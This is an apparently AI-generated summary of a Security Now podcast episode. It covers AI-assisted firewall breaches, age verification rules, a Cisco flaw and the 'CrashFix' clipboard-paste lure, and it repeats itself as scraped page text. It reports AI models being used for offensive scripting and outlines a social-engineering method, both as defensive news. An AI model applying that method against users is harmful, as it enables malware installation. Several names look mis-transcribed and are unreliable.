Security Now 1067: KongTuke's CrashFix — Podcast Summary

Date: March 3, 2026
Hosts: Steve Gibson & Leo Laporte
Theme: Security News, AI in Cyberattacks, Social Engineering Innovations, Notable Vulnerabilities, and the Evolving Threat Landscape

Main Theme Overview

This episode explores the accelerating use of AI (both by attackers and defenders) in modern cyberattacks, the ongoing challenges in code signing for developers, developments in government-mandated age verification, notable vulnerabilities (including a critical Cisco SD-WAN flaw), and the rise of sophisticated social engineering techniques—such as the “CrashFix” exploit used by the group KongTuke (“Kong Tuk”). The episode also covers incidents involving law enforcement’s struggle with AI-generated cyber tips, privacy regulation conflicts, and evolving approaches to national cybersecurity.

Key Discussion Points & Insights

1. Opening and Show Format

The show was recorded early due to travel to Zero Trust World, Orlando.
Steve and Leo reflect on keeping shows current despite shifting schedules.
Listener engagement and editorial commentary are highlighted as central to the show's appeal.

2. Photo of the Week

[12:50] Steve:
Describes a “DIY volume limiter” — a physical hardware hack where a parent installs screws to prevent the stereo volume knob from exceeding a certain level.

Listener suggestions indicated a security screw would be more tamper-proof.
[13:06, Leo:] “Dad found a solution.”

3. Verification of Last Week's Viral “No-Turns” Road Sign

Audience used AI and search tools to confirm the photo's authenticity: Simcoe, Canada.
The sign's confusion and resultant local embarrassment discussed.
[18:11, Steve, quoting listener Joseph Rourke:]
“Despite the presence of the Tim Hortons in the background, we know this cannot be Canada, otherwise there'd be a line of cars sitting at the stop sign.”

4. AI-Driven Hacking Campaign: Fortinet Breaches

[19:00] - Main Segment

600+ Fortinet firewalls breached by Russian-speaking threat actors using AI-generated scripts.
Attack exploited poor configuration: exposed management ports, weak passwords, no MFA.
Claude and DeepSeq AIs used to automate reconnaissance and offensive scripting.
Steve's perspective:
AI is a tool being used by both good and bad actors; it is not inherently culpable.
[24:20, Steve:]
“We called it artificial intelligence. It's not intelligent... It's a very powerful new tool, but it's still a tool and it's not responsible for the way we use it.”
Leo agrees: [24:40, Leo:] “As usual, it's the humans who are the problem.”

Secondary Example:

Breach of Mexican government agencies where the media focused on Claude's use rather than root causes.

5. Age Verification: Apple's Response to Legal Pressures

[26:00] - Apple and the FTC adapt to diverging, region-dependent regulations:

Age verification APIs and processes differ across Brazil, Australia, Singapore, Utah, Louisiana.
Significant complexity and “fragmentation” of age assurance requirements.
[32:40, Leo:]
“The real issue is it's unenforceable. California can't make Linux do this. They can make Apple do it, they can make Google do it because they're gatekeepers, they can go after the companies.”

6. COPPA Conflicts and Regulatory Carve-Out

[37:17] -
FTC won’t enforce COPPA violations for services collecting data solely for age verification, if data is promptly deleted and not used elsewhere.

Legislation is forcing sites into privacy-violating practices while also requiring privacy protection—thus formal exceptions are needed.

7. Meta’s AI Causing Trouble for Law Enforcement

[44:00] -
Meta’s use of AI to detect child sexual abuse content (CSAM) is creating massive volumes of false or incomplete reports.

Law enforcement is overwhelmed and unable to act on many tips.
[59:52, Anonymous ICAC Officer:]
“It's killing morale. We're drowning in tips and we want to get out there and do this work. We don't have the personnel to sustain that...”
Steve’s take: these are “growing pains” of AI; legislated expectations exceed what humans can do, but AI solutions must mature.

8. Digital Repression: Russia’s VPN & Telegram Crackdowns

[60:08] -
Russia blocks 469 VPNs, escalates efforts to fully block Telegram.

Points to citizens’ desperation for outside information and increasing state control.

9. UK’s National Vulnerability Scanning: Good Idea, Bad Messaging

[62:28] -
Steve lauds the UK’s ongoing, automated vulnerability scanning of public networks, but ridicules “AI-written” press releases about “weak DNS records.”

[72:10, Steve:]
“...something that sounds entirely plausible and reasonable to a layperson, but which is actual nonsense... what is a weakness in a government DNS record?”

10. Notorious Psychotherapy Data Extortion Case Update

[82:17] -
Finnish “Vastaamo hacker” who blackmailed psychotherapy patients loses his appeal; reminder of past coverage and the importance of retiring old data.

11. Social Engineering Evolution: Scattered Lapses Hunters (SLH) Recruit Women

[84:53] -

SLH group recruits women for voice phishing; offers $500–$1,000 per call and scripts, targeting IT help desks.
Tactics:
- Training staff to recognize social engineering, regardless of caller voice.
- Strengthen identity verification and logging.
- Move away from SMS-based MFA.

[89:42, Leo:]
Describes a notorious attack where a crying baby sound and a frantic woman caller bypassed help desk suspicion, highlighting the growing sophistication and use of psychological manipulation.

12. Critical Cisco SD-WAN Vulnerability (CVSS 10.0)

[90:17] -

Authentication bypass allows total compromise and privilege escalation on Cisco SD-WAN controllers.
Vulnerability so severe that multiple governments issued synchronized warnings.
Steve advocates for always restricting network access (not relying only on authentication).

13. Vulnerability Exploitation Trends: VolCheck’s 2025 Report

[97:36] -

Only 1% of disclosed vulnerabilities are exploited in the wild, but those that are become highly damaging very quickly.
Notable rise in AI-generated proof-of-concept code, sometimes adding “AI slop” to the signal.

14. Modern Code Signing: CAs, HSMs, Self-Signing

[104:58] -

Developers frustrated by Certificate Authority consolidation and rising costs.
Hardware Security Modules (HSMs) now required for code signing keys; Steve recommends $72 open source “SmartCard HSM.”
Self-signing only practical for internal enterprise use; not viable for distributing software to the public due to trust chain issues.

15. AI for Real-Time Security & User Protection

[114:07] -

Listener question on using local AI agents (like Charlemagne) to prevent user mistakes.
Steve: bullish on the concept; future AV may be replaced by user-focused, non-phoning-home AI assistants.

16. The “Kong Tuk CrashFix” Exploit: A New Twist on ClickFix

[133:56] - Main Deep Dive

Huntress Labs uncovers new iterations of the “click fix” attack attributed to group Kong Tuk.
Tactics:
- Malicious browser extension (“Next Shield”): Cloned lookalike of uBlock Origin Lite.
- Targets users seeking ad blockers, especially domain-joined (enterprise) machines.
- User tricked into triggering browser crash, then shown a convincing “Edge crashed — Run Scan” dialog.
- Clicking the button leads to further instructions: “Press Win-R, paste (clipboard), Enter.”
- Clipboard is populated by attack code; user unknowingly executes malware.
[136:30, Steve:]
“Is this all it takes?”
[139:32, Leo:]
“Sophisticated as hell. Good lord.”
Steve warns: Windows’ power and user scripting ignorance make this a lasting threat. Calls for Microsoft to quarantine clipboard contents sourced by browsers and act at the OS level to block these abuse patterns.

17. Closing Thoughts

Windows, macOS, and major desktop OSes are too powerful and complex for most users’ needs, making them perpetually vulnerable. [147:38, Steve:]
“Windows is way too powerful for most people. They don't need all of this.”
Chrome OS and other locked-down, simpler systems may become better options for most.
Update previews: Next week, deeper dive into VolCheck’s vulnerability exploitation trends.

Notable Quotes & Moments

[24:20, Steve Gibson:]
“We called it artificial intelligence. It's not intelligent... It's a very powerful new tool, but it's still a tool and it's not responsible for the way we use it.”
[59:52, Anonymous ICAC Officer:]
“It's killing morale. We're drowning in tips and we want to get out there and do this work. We don't have the personnel to sustain that...”
[136:30, Steve Gibson:]
“Is this all it takes?”
[139:32, Leo Laporte:]
“Sophisticated as hell. Good lord.”
[147:38, Steve Gibson:]
“Windows is way too powerful for most people. They don't need all of this.”

Important Timestamps

[12:50]: Photo of the week—DIY volume limiter
[19:00]: AI-driven Fortinet breach analysis
[24:20]: Philosophical take—AI as a tool, not an actor
[32:40]: Age verification legal complexity
[37:17]: FTC updates on COPPA & age verification exception
[44:00]: Meta’s AI and law enforcement overwhelmed
[60:08]: Russia blocks VPNs, Telegram crackdown
[62:28]: UK public sector vulnerability scanning
[82:17]: Update on psychotherapy extortion case
[84:53]: Women recruited by SLH for social engineering
[90:17]: Cisco’s critical SD-WAN flaw and mitigation
[104:58]: Modern code signing and HSMs
[133:56]: Kong Tuk “CrashFix” exploit detailed analysis

Takeaways

AI is now ubiquitous in both attack and defense. Security professionals and criminals alike use automation to scale their activities; AI hype should not distract from root problems like bad configuration or human error.
Social engineering is evolving, with psychological and demographic targeting. Expect smarter attacks capitalizing on empathy, new voices, and AI-powered phishing.
Critical vulnerabilities still demand aggressive patching and strong network segmentation. Basic IT hygiene continues to be ignored at great peril.
Complexity and fragmentation in regulation (age validation, privacy) cause headaches for users and developers.
Windows' “click fix” attack vector—clipboard+run dialog abuse—is a sleeping monster. Microsoft must address this vector at the OS level; users alone cannot be expected to defend themselves.
Lockdowns, simplicity, and compartmentalization (à la Chrome OS) may be the future for most users.

For listeners who missed the episode:

This is a dense, high-value episode exploring the intersection of tech tools, human psychology, policy, and the state of modern cyber threats—emphasizing how power, complexity, and behavior outpace both our policies and our technical defenses.

Security Now 1067: KongTuke's CrashFix — Podcast Summary

Date: March 3, 2026
Hosts: Steve Gibson & Leo Laporte
Theme: Security News, AI in Cyberattacks, Social Engineering Innovations, Notable Vulnerabilities, and the Evolving Threat Landscape

Main Theme Overview

Key Discussion Points & Insights

1. Opening and Show Format

The show was recorded early due to travel to Zero Trust World, Orlando.
Steve and Leo reflect on keeping shows current despite shifting schedules.
Listener engagement and editorial commentary are highlighted as central to the show's appeal.

2. Photo of the Week

[12:50] Steve:
Describes a “DIY volume limiter” — a physical hardware hack where a parent installs screws to prevent the stereo volume knob from exceeding a certain level.

Listener suggestions indicated a security screw would be more tamper-proof.
[13:06, Leo:] “Dad found a solution.”

3. Verification of Last Week's Viral “No-Turns” Road Sign

Audience used AI and search tools to confirm the photo's authenticity: Simcoe, Canada.
The sign's confusion and resultant local embarrassment discussed.
[18:11, Steve, quoting listener Joseph Rourke:]
“Despite the presence of the Tim Hortons in the background, we know this cannot be Canada, otherwise there'd be a line of cars sitting at the stop sign.”

4. AI-Driven Hacking Campaign: Fortinet Breaches

[19:00] - Main Segment

600+ Fortinet firewalls breached by Russian-speaking threat actors using AI-generated scripts.
Attack exploited poor configuration: exposed management ports, weak passwords, no MFA.
Claude and DeepSeq AIs used to automate reconnaissance and offensive scripting.
Steve's perspective:
AI is a tool being used by both good and bad actors; it is not inherently culpable.
[24:20, Steve:]
“We called it artificial intelligence. It's not intelligent... It's a very powerful new tool, but it's still a tool and it's not responsible for the way we use it.”
Leo agrees: [24:40, Leo:] “As usual, it's the humans who are the problem.”

Secondary Example:

Breach of Mexican government agencies where the media focused on Claude's use rather than root causes.

5. Age Verification: Apple's Response to Legal Pressures

[26:00] - Apple and the FTC adapt to diverging, region-dependent regulations:

Age verification APIs and processes differ across Brazil, Australia, Singapore, Utah, Louisiana.
Significant complexity and “fragmentation” of age assurance requirements.
[32:40, Leo:]
“The real issue is it's unenforceable. California can't make Linux do this. They can make Apple do it, they can make Google do it because they're gatekeepers, they can go after the companies.”

6. COPPA Conflicts and Regulatory Carve-Out

[37:17] -
FTC won’t enforce COPPA violations for services collecting data solely for age verification, if data is promptly deleted and not used elsewhere.

Legislation is forcing sites into privacy-violating practices while also requiring privacy protection—thus formal exceptions are needed.

7. Meta’s AI Causing Trouble for Law Enforcement

[44:00] -
Meta’s use of AI to detect child sexual abuse content (CSAM) is creating massive volumes of false or incomplete reports.

Law enforcement is overwhelmed and unable to act on many tips.
[59:52, Anonymous ICAC Officer:]
“It's killing morale. We're drowning in tips and we want to get out there and do this work. We don't have the personnel to sustain that...”
Steve’s take: these are “growing pains” of AI; legislated expectations exceed what humans can do, but AI solutions must mature.

8. Digital Repression: Russia’s VPN & Telegram Crackdowns

[60:08] -
Russia blocks 469 VPNs, escalates efforts to fully block Telegram.

Points to citizens’ desperation for outside information and increasing state control.

9. UK’s National Vulnerability Scanning: Good Idea, Bad Messaging

[62:28] -
Steve lauds the UK’s ongoing, automated vulnerability scanning of public networks, but ridicules “AI-written” press releases about “weak DNS records.”

[72:10, Steve:]
“...something that sounds entirely plausible and reasonable to a layperson, but which is actual nonsense... what is a weakness in a government DNS record?”

10. Notorious Psychotherapy Data Extortion Case Update

[82:17] -
Finnish “Vastaamo hacker” who blackmailed psychotherapy patients loses his appeal; reminder of past coverage and the importance of retiring old data.

11. Social Engineering Evolution: Scattered Lapses Hunters (SLH) Recruit Women

[84:53] -

SLH group recruits women for voice phishing; offers $500–$1,000 per call and scripts, targeting IT help desks.
Tactics:
- Training staff to recognize social engineering, regardless of caller voice.
- Strengthen identity verification and logging.
- Move away from SMS-based MFA.

12. Critical Cisco SD-WAN Vulnerability (CVSS 10.0)

[90:17] -

Authentication bypass allows total compromise and privilege escalation on Cisco SD-WAN controllers.
Vulnerability so severe that multiple governments issued synchronized warnings.
Steve advocates for always restricting network access (not relying only on authentication).

13. Vulnerability Exploitation Trends: VolCheck’s 2025 Report

[97:36] -

Only 1% of disclosed vulnerabilities are exploited in the wild, but those that are become highly damaging very quickly.
Notable rise in AI-generated proof-of-concept code, sometimes adding “AI slop” to the signal.

14. Modern Code Signing: CAs, HSMs, Self-Signing

[104:58] -

Developers frustrated by Certificate Authority consolidation and rising costs.
Hardware Security Modules (HSMs) now required for code signing keys; Steve recommends $72 open source “SmartCard HSM.”
Self-signing only practical for internal enterprise use; not viable for distributing software to the public due to trust chain issues.

15. AI for Real-Time Security & User Protection

[114:07] -

Listener question on using local AI agents (like Charlemagne) to prevent user mistakes.
Steve: bullish on the concept; future AV may be replaced by user-focused, non-phoning-home AI assistants.

16. The “Kong Tuk CrashFix” Exploit: A New Twist on ClickFix

[133:56] - Main Deep Dive

Huntress Labs uncovers new iterations of the “click fix” attack attributed to group Kong Tuk.
Tactics:
- Malicious browser extension (“Next Shield”): Cloned lookalike of uBlock Origin Lite.
- Targets users seeking ad blockers, especially domain-joined (enterprise) machines.
- User tricked into triggering browser crash, then shown a convincing “Edge crashed — Run Scan” dialog.
- Clicking the button leads to further instructions: “Press Win-R, paste (clipboard), Enter.”
- Clipboard is populated by attack code; user unknowingly executes malware.
[136:30, Steve:]
“Is this all it takes?”
[139:32, Leo:]
“Sophisticated as hell. Good lord.”
Steve warns: Windows’ power and user scripting ignorance make this a lasting threat. Calls for Microsoft to quarantine clipboard contents sourced by browsers and act at the OS level to block these abuse patterns.

17. Closing Thoughts

Windows, macOS, and major desktop OSes are too powerful and complex for most users’ needs, making them perpetually vulnerable. [147:38, Steve:]
“Windows is way too powerful for most people. They don't need all of this.”
Chrome OS and other locked-down, simpler systems may become better options for most.
Update previews: Next week, deeper dive into VolCheck’s vulnerability exploitation trends.

Notable Quotes & Moments

[24:20, Steve Gibson:]
“We called it artificial intelligence. It's not intelligent... It's a very powerful new tool, but it's still a tool and it's not responsible for the way we use it.”
[59:52, Anonymous ICAC Officer:]
“It's killing morale. We're drowning in tips and we want to get out there and do this work. We don't have the personnel to sustain that...”
[136:30, Steve Gibson:]
“Is this all it takes?”
[139:32, Leo Laporte:]
“Sophisticated as hell. Good lord.”
[147:38, Steve Gibson:]
“Windows is way too powerful for most people. They don't need all of this.”

Important Timestamps

[12:50]: Photo of the week—DIY volume limiter
[19:00]: AI-driven Fortinet breach analysis
[24:20]: Philosophical take—AI as a tool, not an actor
[32:40]: Age verification legal complexity
[37:17]: FTC updates on COPPA & age verification exception
[44:00]: Meta’s AI and law enforcement overwhelmed
[60:08]: Russia blocks VPNs, Telegram crackdown
[62:28]: UK public sector vulnerability scanning
[82:17]: Update on psychotherapy extortion case
[84:53]: Women recruited by SLH for social engineering
[90:17]: Cisco’s critical SD-WAN flaw and mitigation
[104:58]: Modern code signing and HSMs
[133:56]: Kong Tuk “CrashFix” exploit detailed analysis

Takeaways

AI is now ubiquitous in both attack and defense. Security professionals and criminals alike use automation to scale their activities; AI hype should not distract from root problems like bad configuration or human error.
Social engineering is evolving, with psychological and demographic targeting. Expect smarter attacks capitalizing on empathy, new voices, and AI-powered phishing.
Critical vulnerabilities still demand aggressive patching and strong network segmentation. Basic IT hygiene continues to be ignored at great peril.
Complexity and fragmentation in regulation (age validation, privacy) cause headaches for users and developers.
Windows' “click fix” attack vector—clipboard+run dialog abuse—is a sleeping monster. Microsoft must address this vector at the OS level; users alone cannot be expected to defend themselves.
Lockdowns, simplicity, and compartmentalization (à la Chrome OS) may be the future for most users.

Security Now 1067: KongTuke's CrashFix

Powered by Wave AI

Summary

Security Now 1067: KongTuke's CrashFix — Podcast Summary

Main Theme Overview

Key Discussion Points & Insights

1. Opening and Show Format

2. Photo of the Week

3. Verification of Last Week's Viral “No-Turns” Road Sign

4. AI-Driven Hacking Campaign: Fortinet Breaches

Secondary Example:

5. Age Verification: Apple's Response to Legal Pressures

6. COPPA Conflicts and Regulatory Carve-Out

7. Meta’s AI Causing Trouble for Law Enforcement

8. Digital Repression: Russia’s VPN & Telegram Crackdowns

9. UK’s National Vulnerability Scanning: Good Idea, Bad Messaging

10. Notorious Psychotherapy Data Extortion Case Update

11. Social Engineering Evolution: Scattered Lapses Hunters (SLH) Recruit Women

12. Critical Cisco SD-WAN Vulnerability (CVSS 10.0)

13. Vulnerability Exploitation Trends: VolCheck’s 2025 Report

14. Modern Code Signing: CAs, HSMs, Self-Signing

15. AI for Real-Time Security & User Protection

16. The “Kong Tuk CrashFix” Exploit: A New Twist on ClickFix

17. Closing Thoughts

Notable Quotes & Moments

Important Timestamps

Takeaways

For listeners who missed the episode:

Summary

Security Now 1067: KongTuke's CrashFix — Podcast Summary

Main Theme Overview

Key Discussion Points & Insights

1. Opening and Show Format

2. Photo of the Week

3. Verification of Last Week's Viral “No-Turns” Road Sign

4. AI-Driven Hacking Campaign: Fortinet Breaches

Secondary Example:

5. Age Verification: Apple's Response to Legal Pressures

6. COPPA Conflicts and Regulatory Carve-Out

7. Meta’s AI Causing Trouble for Law Enforcement

8. Digital Repression: Russia’s VPN & Telegram Crackdowns

9. UK’s National Vulnerability Scanning: Good Idea, Bad Messaging

10. Notorious Psychotherapy Data Extortion Case Update

11. Social Engineering Evolution: Scattered Lapses Hunters (SLH) Recruit Women

12. Critical Cisco SD-WAN Vulnerability (CVSS 10.0)

13. Vulnerability Exploitation Trends: VolCheck’s 2025 Report

14. Modern Code Signing: CAs, HSMs, Self-Signing

15. AI for Real-Time Security & User Protection

16. The “Kong Tuk CrashFix” Exploit: A New Twist on ClickFix

17. Closing Thoughts

Notable Quotes & Moments

Important Timestamps

Takeaways

For listeners who missed the episode: